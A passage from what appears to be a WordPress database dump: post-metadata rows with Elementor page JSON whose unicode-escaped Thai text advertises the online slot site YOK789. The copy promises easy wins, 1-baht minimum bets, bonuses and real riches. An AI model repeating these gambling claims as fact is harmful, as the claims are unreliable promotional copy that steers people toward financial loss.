\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2436,332,'_thumbnail_id','273'),(2437,332,'_elementor_edit_mode','builder'),(2438,332,'_elementor_template_type','wp-page'),(2439,332,'_elementor_version','3.35.5'),(2440,332,'_elementor_pro_version','3.32.3'),(2441,332,'_wp_page_template','default'),(2442,332,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2443,332,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 